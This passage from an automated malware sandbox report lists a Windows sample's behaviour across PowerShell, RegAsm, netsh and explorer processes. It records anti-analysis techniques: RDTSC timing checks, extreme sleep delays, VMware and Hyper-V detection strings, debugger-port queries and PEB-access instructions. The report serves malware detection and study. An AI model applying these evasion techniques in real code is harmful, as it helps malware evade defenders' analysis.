Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC3730774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC3730774
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372D8A4
Source: C:\Windows\SysWOW64\netsh.exe API/Special instruction interceptor: Address: 7FFCC372DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: B09904 second address: B0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: B09B7E second address: B09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00409AB0 rdtsc 6_2_00409AB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5448
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 9736
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 886
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 863
Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 2735
Source: C:\Windows\SysWOW64\netsh.exe Window / User API: threadDelayed 7237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 1.9 %
Source: C:\Windows\SysWOW64\netsh.exe API coverage: 1.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep count: 4342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep count: 5448 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep count: 9736 > 30
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep time: -19472000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep count: 209 > 30
Source: C:\Windows\explorer.exe TID: 7312 Thread sleep time: -418000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep count: 2735 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep time: -5470000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep count: 7237 > 30
Source: C:\Windows\SysWOW64\netsh.exe TID: 7420 Thread sleep time: -14474000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe Last function: Thread delayed
Source: explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTabVMWare
Source: explorer.exe, 00000007.00000002.2662764839.0000000009CEC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00OwHgZXS.
Source: explorer.exe, 00000007.00000000.1523845606.0000000009C0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ones
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware20,1
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000000.1523845606.0000000009C0B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}W)1
Source: explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000007.00000002.2662764839.00000000099E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009A4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009A4D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter`
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000007.00000000.1516382431.00000000012E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000003.2072408044.0000000007C1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2660117349.0000000007C1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1519605877.0000000007C1D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en\machine.inf_loc
Source: explorer.exe, 00000007.00000003.2071685840.0000000009C28000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000i
Source: explorer.exe, 00000007.00000003.2071685840.0000000009C28000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000.
Source: explorer.exe, 00000007.00000000.1517673112.00000000038F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0040ACF0 LdrLoadDll, 6_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FA30B mov eax, dword ptr fs:[00000030h] 6_2_030FA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BC310 mov ecx, dword ptr fs:[00000030h] 6_2_030BC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E0310 mov ecx, dword ptr fs:[00000030h] 6_2_030E0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314930B mov eax, dword ptr fs:[00000030h] 6_2_0314930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EF32A mov eax, dword ptr fs:[00000030h] 6_2_030EF32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318132D mov eax, dword ptr fs:[00000030h] 6_2_0318132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B7330 mov eax, dword ptr fs:[00000030h] 6_2_030B7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD34C mov eax, dword ptr fs:[00000030h] 6_2_030BD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov eax, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0314035C mov ecx, dword ptr fs:[00000030h] 6_2_0314035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318A352 mov eax, dword ptr fs:[00000030h] 6_2_0318A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195341 mov eax, dword ptr fs:[00000030h] 6_2_03195341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9353 mov eax, dword ptr fs:[00000030h] 6_2_030B9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03142349 mov eax, dword ptr fs:[00000030h] 6_2_03142349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316437C mov eax, dword ptr fs:[00000030h] 6_2_0316437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F367 mov eax, dword ptr fs:[00000030h] 6_2_0317F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C7370 mov eax, dword ptr fs:[00000030h] 6_2_030C7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E438F mov eax, dword ptr fs:[00000030h] 6_2_030E438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BE388 mov eax, dword ptr fs:[00000030h] 6_2_030BE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319539D mov eax, dword ptr fs:[00000030h] 6_2_0319539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0311739A mov eax, dword ptr fs:[00000030h] 6_2_0311739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B8397 mov eax, dword ptr fs:[00000030h] 6_2_030B8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E33A5 mov eax, dword ptr fs:[00000030h] 6_2_030E33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F33A0 mov eax, dword ptr fs:[00000030h] 6_2_030F33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317B3D0 mov ecx, dword ptr fs:[00000030h] 6_2_0317B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA3C0 mov eax, dword ptr fs:[00000030h] 6_2_030CA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C83C0 mov eax, dword ptr fs:[00000030h] 6_2_030C83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317C3CD mov eax, dword ptr fs:[00000030h] 6_2_0317C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D03E9 mov eax, dword ptr fs:[00000030h] 6_2_030D03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031953FC mov eax, dword ptr fs:[00000030h] 6_2_031953FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F63FF mov eax, dword ptr fs:[00000030h] 6_2_030F63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F3E6 mov eax, dword ptr fs:[00000030h] 6_2_0317F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE3F0 mov eax, dword ptr fs:[00000030h] 6_2_030DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F7208 mov eax, dword ptr fs:[00000030h] 6_2_030F7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B823B mov eax, dword ptr fs:[00000030h] 6_2_030B823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195227 mov eax, dword ptr fs:[00000030h] 6_2_03195227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317B256 mov eax, dword ptr fs:[00000030h] 6_2_0317B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F724D mov eax, dword ptr fs:[00000030h] 6_2_030F724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B9240 mov eax, dword ptr fs:[00000030h] 6_2_030B9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C6259 mov eax, dword ptr fs:[00000030h] 6_2_030C6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BA250 mov eax, dword ptr fs:[00000030h] 6_2_030BA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B826B mov eax, dword ptr fs:[00000030h] 6_2_030B826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03101270 mov eax, dword ptr fs:[00000030h] 6_2_03101270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 mov eax, dword ptr fs:[00000030h] 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C4260 mov eax, dword ptr fs:[00000030h] 6_2_030C4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318D26B mov eax, dword ptr fs:[00000030h] 6_2_0318D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E9274 mov eax, dword ptr fs:[00000030h] 6_2_030E9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FE284 mov eax, dword ptr fs:[00000030h] 6_2_030FE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FE284 mov eax, dword ptr fs:[00000030h] 6_2_030FE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F329E mov eax, dword ptr fs:[00000030h] 6_2_030F329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F329E mov eax, dword ptr fs:[00000030h] 6_2_030F329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03140283 mov eax, dword ptr fs:[00000030h] 6_2_03140283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03140283 mov eax, dword ptr fs:[00000030h] 6_2_03140283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03140283 mov eax, dword ptr fs:[00000030h] 6_2_03140283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03195283 mov eax, dword ptr fs:[00000030h] 6_2_03195283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov eax, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov eax, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov ecx, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031492BC mov ecx, dword ptr fs:[00000030h] 6_2_031492BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02A0 mov eax, dword ptr fs:[00000030h] 6_2_030D02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02A0 mov eax, dword ptr fs:[00000030h] 6_2_030D02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 mov eax, dword ptr fs:[00000030h] 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov ecx, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031562A0 mov eax, dword ptr fs:[00000030h] 6_2_031562A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031572A0 mov eax, dword ptr fs:[00000030h] 6_2_031572A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031572A0 mov eax, dword ptr fs:[00000030h] 6_2_031572A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031892A6 mov eax, dword ptr fs:[00000030h] 6_2_031892A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C92C5 mov eax, dword ptr fs:[00000030h] 6_2_030C92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C92C5 mov eax, dword ptr fs:[00000030h] 6_2_030C92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 mov eax, dword ptr fs:[00000030h] 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CA2C3 mov eax, dword ptr fs:[00000030h] 6_2_030CA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB2D3 mov eax, dword ptr fs:[00000030h] 6_2_030BB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB2D3 mov eax, dword ptr fs:[00000030h] 6_2_030BB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BB2D3 mov eax, dword ptr fs:[00000030h] 6_2_030BB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EF2D0 mov eax, dword ptr fs:[00000030h] 6_2_030EF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EF2D0 mov eax, dword ptr fs:[00000030h] 6_2_030EF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02E1 mov eax, dword ptr fs:[00000030h] 6_2_030D02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02E1 mov eax, dword ptr fs:[00000030h] 6_2_030D02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D02E1 mov eax, dword ptr fs:[00000030h] 6_2_030D02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F2F8 mov eax, dword ptr fs:[00000030h] 6_2_0317F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B92FF mov eax, dword ptr fs:[00000030h] 6_2_030B92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED mov eax, dword ptr fs:[00000030h] 6_2_031712ED
